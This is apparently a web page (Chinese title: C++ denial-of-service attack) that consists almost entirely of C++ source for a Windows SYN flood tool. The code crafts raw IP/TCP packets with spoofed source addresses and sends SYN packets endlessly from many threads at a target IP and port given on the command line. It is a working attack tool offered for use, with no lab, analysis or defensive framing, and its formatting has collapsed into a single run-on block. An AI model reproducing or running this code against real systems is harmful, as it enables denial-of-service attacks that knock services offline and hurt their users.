C++拒绝服务攻击DOS

#include <winsock2.h>#include <Ws2tcpip.h> #include <stdio.h>#pragma comment(lib,"ws2_32.lib")#define SEQ 0x28376839int threadnum, maxthread, port;char *DestIP; //目标IPvoid display(void)  // 定义状态提示函数 {static int play = 0;// 进度条 char *plays[12] = { " | ", " / ", " - ", " \\ ", " | ", " / ", " - ", " \\ ", " | ", " / ", " - ", " \\ ", };printf("=%s= %d threads \r", plays[play], threadnum);play = (play == 11) ? 0 : play + 1;}//定义一个tcphdr结构来存放TCP首部typedef struct tcphdr {USHORT th_sport;  //16位源端口号USHORT th_dport;  //16位目的端口号unsigned int th_seq;  //32位序列号unsigned int th_ack;  //32位确认号unsigned char th_lenres;  //4位首部长度+6位保留字中的4位unsigned char th_flag;  ////6位标志位USHORT th_win;  //16位窗口大小USHORT th_sum;  //16位效验和USHORT th_urp;  //16位紧急数据偏移量} TCP_HEADER;//定义一个iphdr来存放IP首部typedef struct iphdr  //ip首部{unsigned char h_verlen;  //4位手部长度，和4位IP版本号unsigned char tos;  //8位类型服务unsigned short total_len;  //16位总长度unsigned short ident;  //16位标志unsigned short frag_and_flags;  //3位标志位（如SYN,ACK,等等)unsigned char ttl;  //8位生存时间unsigned char proto;  //8位协议unsigned short checksum;  //ip手部效验和unsigned int sourceIP;  //伪造IP地址unsigned int destIP;  //攻击的ip地址} IP_HEADER;//TCP伪首部，用于进行TCP效验和的计算，保证TCP效验的有效性struct {unsigned long saddr;  //源地址unsigned long daddr;  //目的地址char mbz;  //置空char ptcl;  //协议类型unsigned short tcpl;  //TCP长度} PSD_HEADER;//计算效验和函数，先把IP首部的效验和字段设为0(IP_HEADER.checksum=0)//然后计算整个IP首部的二进制反码的和。USHORT checksum(USHORT *buffer, int size) {unsigned long cksum = 0;while (size > 1) {cksum += *buffer++;size -= sizeof(USHORT);}if (size)cksum += *(UCHAR*) buffer;cksum = (cksum >> 16) + (cksum & 0xffff);cksum += (cksum >> 16);return (USHORT)(~cksum);}DWORD WINAPI SynfloodThread(LPVOID lp)  //synflood线程函数{SOCKET sock = NULL;int ErrorCode = 0, flag = true, TimeOut = 2000, FakeIpNet, FakeIpHost,dataSize = 0, SendSEQ = 0;struct sockaddr_in sockAddr;TCP_HEADER tcpheader;IP_HEADER ipheader;char sendBuf[128];sock = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0,WSA_FLAG_OVERLAPPED);if (sock == INVALID_SOCKET) {printf("Socket failed: %d\n", WSAGetLastError());return 0;}//设置IP_HDRINCL以便自己填充IP首部ErrorCode = setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *) &flag,sizeof(int));if (ErrorCode == SOCKET_ERROR) {printf("Set sockopt failed: %d\n", WSAGetLastError());return 0;}//设置发送超时ErrorCode = setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char*) &TimeOut,sizeof(TimeOut));if (ErrorCode == SOCKET_ERROR) {printf("Set sockopt time out failed: %d\n", WSAGetLastError());return 0;}//设置目标地址memset(&sockAddr, 0, sizeof(sockAddr));sockAddr.sin_family = AF_INET;sockAddr.sin_addr.s_addr = inet_addr(DestIP);FakeIpNet = inet_addr(DestIP);FakeIpHost = ntohl(FakeIpNet);//填充IP首部ipheader.h_verlen = (4 << 4 | sizeof(IP_HEADER) / sizeof(unsigned long));ipheader.total_len = htons(sizeof(IP_HEADER) + sizeof(TCP_HEADER));ipheader.ident = 1;ipheader.frag_and_flags = 0;ipheader.ttl = 128;ipheader.proto = IPPROTO_TCP;ipheader.checksum = 0;ipheader.sourceIP = htonl(FakeIpHost + SendSEQ);ipheader.destIP = inet_addr(DestIP);//填充TCP首部tcpheader.th_dport = htons(port);tcpheader.th_sport = htons(8080);tcpheader.th_seq = htonl(SEQ + SendSEQ);tcpheader.th_ack = 0;tcpheader.th_lenres = (sizeof(TCP_HEADER) / 4 << 4 | 0);tcpheader.th_flag = 2;tcpheader.th_win = htons(16384);tcpheader.th_urp = 0;tcpheader.th_sum = 0;PSD_HEADER.saddr = ipheader.sourceIP;PSD_HEADER.daddr = ipheader.destIP;PSD_HEADER.mbz = 0;PSD_HEADER.ptcl = IPPROTO_TCP;PSD_HEADER.tcpl = htons(sizeof(tcpheader));for (;;) {SendSEQ = (SendSEQ == 65536) ? 1 : SendSEQ + 1;ipheader.checksum = 0;ipheader.sourceIP = htonl(FakeIpHost + SendSEQ);tcpheader.th_seq = htonl(SEQ + SendSEQ);tcpheader.th_sport = htons(SendSEQ);tcpheader.th_sum = 0;PSD_HEADER.saddr = ipheader.sourceIP;//把TCP伪首部和TCP首部复制到同一缓冲区并计算TCP效验和memcpy(sendBuf, &PSD_HEADER, sizeof(PSD_HEADER));memcpy(sendBuf + sizeof(PSD_HEADER), &tcpheader, sizeof(tcpheader));tcpheader.th_sum = checksum((USHORT *) sendBuf,sizeof(PSD_HEADER) + sizeof(tcpheader));memcpy(sendBuf, &ipheader, sizeof(ipheader));memcpy(sendBuf + sizeof(ipheader), &tcpheader, sizeof(tcpheader));memset(sendBuf + sizeof(ipheader) + sizeof(tcpheader), 0, 4);dataSize = sizeof(ipheader) + sizeof(tcpheader);ipheader.checksum = checksum((USHORT *) sendBuf, dataSize);memcpy(sendBuf, &ipheader, sizeof(ipheader));sendto(sock, sendBuf, dataSize, 0, (struct sockaddr*) &sockAddr,sizeof(sockAddr));display();}  //end forSleep(20);InterlockedExchangeAdd((long *) &threadnum, -1);return 0;}void usage() {printf("\t===================SYN Flood======================\n");printf("\t==========gxisone@hotmail.com     2004/7/6========\n");printf("\tusage: [dest_IP] [port] [thread]\n");printf("\tExample:192.168.1.1 80 100\n");}int main(int argc, char* argv[]) {if (argc != 4) {usage();return 0;}int ErrorCode = 0;DestIP = argv[1];  //取得目标主机IPport = atoi(argv[2]);  //取得目标端口号maxthread = (maxthread > 100) ? 100 : atoi(argv[3]);printf("\t %s %d %d\n", DestIP, port, maxthread);//如果线程数大于100则把线程数设置为100WSADATA wsaData;if ((ErrorCode = WSAStartup(MAKEWORD(2, 2), &wsaData)) != 0) {printf("WSAStartup failed: %d\n", ErrorCode);return 0;}printf("[start]...........\nPress any key to stop!\n");while (threadnum < maxthread)  //循环创建线程{if (CreateThread(NULL, 0, SynfloodThread, 0, 0, 0)) {Sleep(10);threadnum++;}}WSACleanup();printf("\n[Stopd]...........\n");return 0;}